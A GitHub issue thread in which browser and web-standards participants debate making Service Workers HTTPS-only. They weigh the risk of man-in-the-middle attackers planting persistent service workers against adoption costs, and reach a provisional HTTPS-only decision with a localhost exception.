-
Notifications
You must be signed in to change notification settings - Fork 317
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
SSL/TLS Only? #199
Comments
What are the arguments for/against as you see them? My view is that it would be a barrier to adoption due to cost and complexity, although that's only off the top of my head. |
Only if there's very good reason. It will hurt adoption. |
I think the very basic usecase of a coffeeshop that uses man-in-the-middle on all non-encrypted sites that you visit while in the shop, and uses serviceworkers to inject ads (or 1x1 pixel trackers, or whatever) into your content..forever. Even after you leave the coffee shop, the SW is potentially still installed for all sites you visited, and you as a user don't even know if you're "infected" or not. Yes, we're supposed to re-fetch the SW script every 24 hours but you can think of lots of workarounds for that. So we need to think through all the workarounds and figure out a way that the service worker behaves sanely for a legal script, but One example: because we're also trying to be resilient against bad network connections and captive portals, (such that our app behaves sanely if it tries to update with a bad network) then I assume the user agent should persistently cache a SW script past 24 hours, if the script url resolves to an HTML page during update (i.e. if you're on a captive portal and all pages are redirected) So now the attacker can choose a url that it has pre-determined always gets an HTML page - so we don't update the SW. |
It's the persistence that @alecf mentions that convinced me we need to require HTTPS. Today, if a coffeeshop owner injects ads (or bitcoin computation) into your HTTP pages, those ads go away when you leave the coffeeshop. With SWs, those ads could follow you forever (Even shift-refresh won't help if the real site doesn't register a SW of its own). We could imagine auto-unregistering SWs more aggressively in order to limit the damage a malicious captive portal can do, but that's likely to cause problems in other cases. The simplest fix is to require secure transport for the original registration. Service Workers can help reduce the cost of SSL too: since SWs can cache resources, they'll reduce the number of requests to the server, and the lower cost should make it a bit easier for site owners to switch to SSL. |
For the offline case where persistence is absolutely required, SSL only But cases where persistence isn't really needed seem possible [this isn't On Thu, Mar 20, 2014 at 12:00 PM, Jeffrey Yasskin
|
@michael-nordman I think we should examine "cases where persistence isn't needed" one-by-one. The cases I know of are things like push messages, geofencing, and notifications, where there's an even stronger argument to make them HTTPS-only: we and the user need to decide whether to allow these capabilities based on the identity of the site, and that identity is only trustworthy over HTTPS. Do you have an example of an event that you think it's sensible to deliver to a SW loaded via HTTP? Is the value of that event worth complicating the SW spec/implementation? |
I don't follow the scenario. I visit StarBucks. Someone injects a SW. 24h later my browser asks for an updated SW, the server returns nothing or a SW of its own. As long as we deal with "nothing" appropriately I do not see the problem. I can totally imagine wanting to browse something like http://krijnhoetmer.nl/irc-logs/ offline and although the trend will be TLS-only, I do not think features should be gated on it. |
For comparison: With HTTP caching
With AppCache
With ServiceWorker
From an |
Actually, the SW attack won't last only 24hrs, as the url for the evil SW will 404, and currently that means we retain the current SW. Should we change that? In appcache, 404 is like unregister, should we adopt that? |
I think so, in offline it should remain but on 404, the domain exists but |
Yeah implementors are going to have to be very careful here about aggressively unregistering SW scripts - if you imagine that an app which you thought was usable offline suddenly uninstalls itself (removing SW scripts, etc) because you drove by a starbucks with a captive portal, which 404's all urls until you hit "agree" on their terms of service. I don't think 404 is a strong enough signal to justify unregistering the script... but again this issue is solved with https - if the https connection is invalid (i.e. rather than a successful http connection with a 404 response) then we know we simply couldn't reach the other end, and is possibly a proxy for whether or not the network connection is "valid" |
Minor issue: The current spec says that ServiceWorkers need to be same-origin to the document. SSL-only would mean that we can't have ServiceWorkers for HTTP apps. I believe you will need to rewrite to this weird rule: "ServiceWorkers are same-origin except when main document, when upgraded to https is same-origin" But, is even that enough? A site may have HTTP apps on "app.com" but supports SSL only over "secure.app.com" Other examples: the github hosting (foobar.github.io) does not support https. There doesn't seem to be a way to support same-origin + SSL-only Service Workers. I can find a place to host my ServiceWorker code over SSL but it can't be same-origin to the github hosted content. I will also point out that using bad networks to have a persistent XSS is not a new threat. See a blogpost, or Artur Jancic's work presentation, video or an academic paper Of course, no doubt it is the case that with ServiceWorkers things become a lot worse. Still, maybe it is better to stick to same-origin restrictions and let sites switch to SSL/HSTS if they are worried? |
Interesting point about persistent XSS, but I think we can do better with new APIs, and this is a perfect example. The problem isn't that a site opts into using a ServiceWorker over insecure HTTP, this attack lets any man-in-the-middle inject into any web page that the user visits, whether or not that site already uses ServiceWorkers, and lets that injection stay permanent. I think this is somewhat unique to previous threats in that most previous persistent threats still relied on weaknesses in specific site's uses of, say, localStorage. i.e. gmail could have some injection attack on localStorage, but that only affects gmail if gmail had some weakness. This affects all sites that the user visits on an insecure network, whether they are already subject to XSS attacks or not, and whether or not they use service workers. |
IIUC, browsers have a lot of discretion about when they accept a Service Worker registration, and when they time that SW out of their cache. So even if the spec doesn't require SWs to be served over TLS, each browser can pick policies about how long to save an insecure SW depending on their security team's preferences, possibly as far as deciding that each page load starts completely fresh. @devd, I'll ask some Chrome security folks if they're happy with just a requirement that the main SW script itself is secure, rather than the page telling the browser to load it. I believe they want to use attractive new features like SWs as a lever to get more sites onto TLS, but they may be able to point out actual attacks with that weaker requirement too. |
Oh, wait, @devd, if the page requesting the SW isn't secure, and the SW is https but on an attacker-controlled domain, you haven't gained anything at all. Yes, the whole app will need to be https. github.io should upgrade. |
@alecf See @jakearchibald's comments above. With caching, an attacker can also achieve a long lived XSS. I apologize---jake's comment is what I should have used, the links I pointed to are not that directly related. How about we extend the SW design to say "hard refresh clears SW and fetches it again"? This will then bring the vulnerability down to what can be done with existing caching. @jyasskin Well, one design that could work is "same-origin except for the protocol which must be https for the SW" |
It's unfortunate that github.io doesn't offer HTTPS. devd@, have you filed a bug with them and asked why they don't? [Disregard this portion of the comment, I was confused about the topic under discussion. But leaving for posterity: When the user asks to "keep" a site, the user is making that trust decision based on the identity of the site. HTTPS for both the serving page and service worker makes sure the user gets what she expects from who she expects.] |
I am not sure what you mean by "user asks to keep a site." Is there a UI dialog for installing SWs? Did I miss it in the spec? I agree that "HTTPS ensures that the user gets what she expects". But, it seems to me that HTTP is still popular. GitHub is just a currently popular example. See Anne's example: http://krijnhoetmer.nl/irc-logs/ it is perfectly reasonable to want to browse that offline. my point was: limiting SW to https means we are limiting the use of SW to HTTPS documents. Are we sure we want that? |
btw, I was wrong: Github supports HTTPS for *.github.io. I should have tested before commenting. I apologize! But the last question in comment above still stands, imho |
404 seems sufficient to unregister to me. Captive portals could be problematic, but only if they are not detected first by the network stack and then again, having less guarantees on HTTP seems okay. |
+1 |
Don't "friendly" captive portals do a cross-domain redirect instead of 404ing? Cross-domain redirects won't be treated as unregister, they'll be an update failure. |
@jakearchibald and I have put together a document at https://docs.google.com/document/d/1KWa2TIAtwkaAyFkV9tR6A_6VuoOx5MXGr8UDpF2RwBE/edit?usp=sharing that explains the attack and proposes a set of restrictions on HTTP service workers to mitigate it. I'm planning to send this to our security team to see if they can poke holes in it, but I'd like to get you folks' thoughts/fixes first. You should all be able to comment (please sign in or sign your comments though), and I'll grant edit permissions as I find your email addresses. |
I support the move to TLS-only, with the lack of other mitigation methods for these attacks. Also - I find the info in @jakearchibald's comment regarding HTTP cache attacks disturbing. It's probably off topic, but I think we should do something to protect users from that form of attack as well. While moving to TLS-only is not an option IMO, Cache revalidation after switching networks might be a proper mitigation. Such revalidation won't be able to rely on Etag/Last-Modified headers, since they can easily be faked as well. Maybe this can be combined with the Subresource-integrity spec in some way. I'll take that with the WebAppSec people. |
@jyasskin it describes only one kind of attack, the "in the clear" captive portal. Some captive portals also redirect SSL traffic (through DNS) and present usually self-signed certificates, this needs also to be addressed. And I am not even talking about injection done on https traffic from entities able to have access to trusted CAs. |
Again, the attack would only last at most 24 hours and would only work for sites that cannot be trusted anyway. I'm not convinced. |
@annevk we check for updates on navigation and cap max-age at 24 hours. However, if the update check ends with http 500, network failure, cross-origin redirect, parse error, we keep the old version. This means an attacker can keep the infected version around longer. I don't want to go HTTPS-only unless we really have to, see https://docs.google.com/document/d/1KWa2TIAtwkaAyFkV9tR6A_6VuoOx5MXGr8UDpF2RwBE/edit for what we'd need to do to mitigate these attacks. (note: appcache is currently open to most of these attacks) |
Another idea (also commented in the doc): For HTTP, could we require the ServiceWorker script (and imports) match what a trusted server sees at that url? Eg, Chrome fetches the SW script, then asks a Google server for a hash of what it sees at that url. If the hashes do not match, no install. This means you couldn't internationalise/personalise SW. If you want to do that, go HTTPS. |
That sounds like overkill to me. Again, HTTP-only should only be considered for trivial sites anyway. Anyone who builds something complicated that needs to be trusted cannot use HTTP-only anyway. |
I'm worried about sites like the BBC & Guardian where the user trusts the content. (but yes, these sites are already vulnerable to appcache) |
Anything served over HTTP is vulnerable to MitM attacks, and can’t be trusted by any user. If the BBC / The Guardian value security of their users they should really start to use HTTPS (regardless of whether appcache/SW comes into play).
They’re vulnerable to MitM attacks in general. I agree with @annevk. |
@mathiasbynens One reason the security folks want to make new platform features HTTPS-only is that the BBC/Guardian demonstrably don't care about the security of their users in this way, but they're likely to care about the speed their pages load. By tying faster page loads to secure connections, even artificially, we can improve users' security. Trivial sites that don't need Service Workers could stay on HTTP, but non-trivial sites would need to move to HTTPS, as @annevk suggested. However, I also sympathize with the objections to tying things together artificially like that, which is why we put together the document about how to mitigate the more concrete problems with SWs over HTTP. |
It could help TLS adoption, though, if new Web features were https-only. I can see the point that it's not cool to hold other features hostage in order to drive https adoption, but when a feature needs special mitigations in order not to be a disaster without https, I think it's fair to make the feature https-only. Also, it seems implausible that sites whose developers would be competent enough to deploy ServiceWorkers wouldn't be competent enough to deploy https. HTTP cache attacks and AppCache attacks are not a good reason to introduce more attack surface of similar nature. |
What about localhost? Or file: scheme? Should this not be allowed to use ServiceWorkers because they don't have TLS? I see it a step backwards... |
Depending on how a ServiceWorker's caches work (I wasn't able to find details, if they've even been hammered down yet), I can imagine another potential issue with http and captive portals. Say we already have a SW installed on example.com and open it again while under a perfectly well-behaved captive portal. We load example.com, get the shell of the app from cache, never touch the network, app works offline, all is well. Then something needs to hit the network and the SW decides to save it in some cache. What happens when the captive portal hijacks that request? If the captive portal is well-behaved, hopefully it sends sufficient Cache-Control headers to avoid poisoning the cache, but if SW doesn't use HTTP caching semantics, it might stick. |
hey all, There's been a ton of good debate in this thread. The face-to-face meeting at Mozilla today included Patrick McManus (who is helping to design HTTP 2.0). The design points appear to be:
The arguments for SSL include:
The provisional decision is to make Service Workers HTTPS-only. We'll see how the beta period goes. If we have to walk it back, we'll need to add many mitigations to the HTTP mode. At some level, this is the smallest intervention needed to get good security and developer usability. |
This provisional decision still includes the localhost exception right? What about custom domains that resolve to localhost? For example, I put |
Yes, DevTools are encouraged to allow disabling of HTTPS-only restriction
|
Sorry to jump on this thread rather late, and what I have to say probably doesn't affect the outcome but...
I just checked this - and it doesn't seem to be true - it seems like if you return a 404 for a manifest then AppCache aborts the update process and sticks with the set of files it already has. (I agree that this should be the behaviour though - especially if https isn't enforced for SW - that it would be sensible for a 404 to trigger the unregistration of both ServiceWorker and AppCache - but other similar status codes, eg. 5xx or other 4xx probably shouldn't cause this to happen) Also because there is (as far as I know) no way to unregister an AppCache right now the upgrade process from AppCache to ServiceWorker is really difficult. Whilst there isn't a huge amount of adoption of AppCache there is some. Have I missed something or is it worth considering adding into the spec something to explicitly disable AppCache if a ServiceWorker is installed? (Or, better, just changing AppCache's spec so that it gets automatically installed if their manifests return 404s - or is that something we can't do/shouldn't discuss here?) |
Really? Does it continue to use the cache on refresh? This isn't what the spec says (http://www.whatwg.org/specs/web-apps/current-work/multipage/offline.html#downloading-or-updating-an-application-cache - see step 5) |
Oops. You're right. Test case was flawed :) |
Clobbering on 404 is just a bad idea. It massively complicates The interop scenario is still relatively undecided. I think we should open On Mon, May 12, 2014 at 3:46 AM, Matt Andrews [email protected]:
|
I've outlined a possible mitigation for the "MITMed SW" scenario on WebAppSec. |
There's strong feeling on the Chrome team that (with a localhost exception), Service Workers should be SSL-only.
What say we?
The text was updated successfully, but these errors were encountered: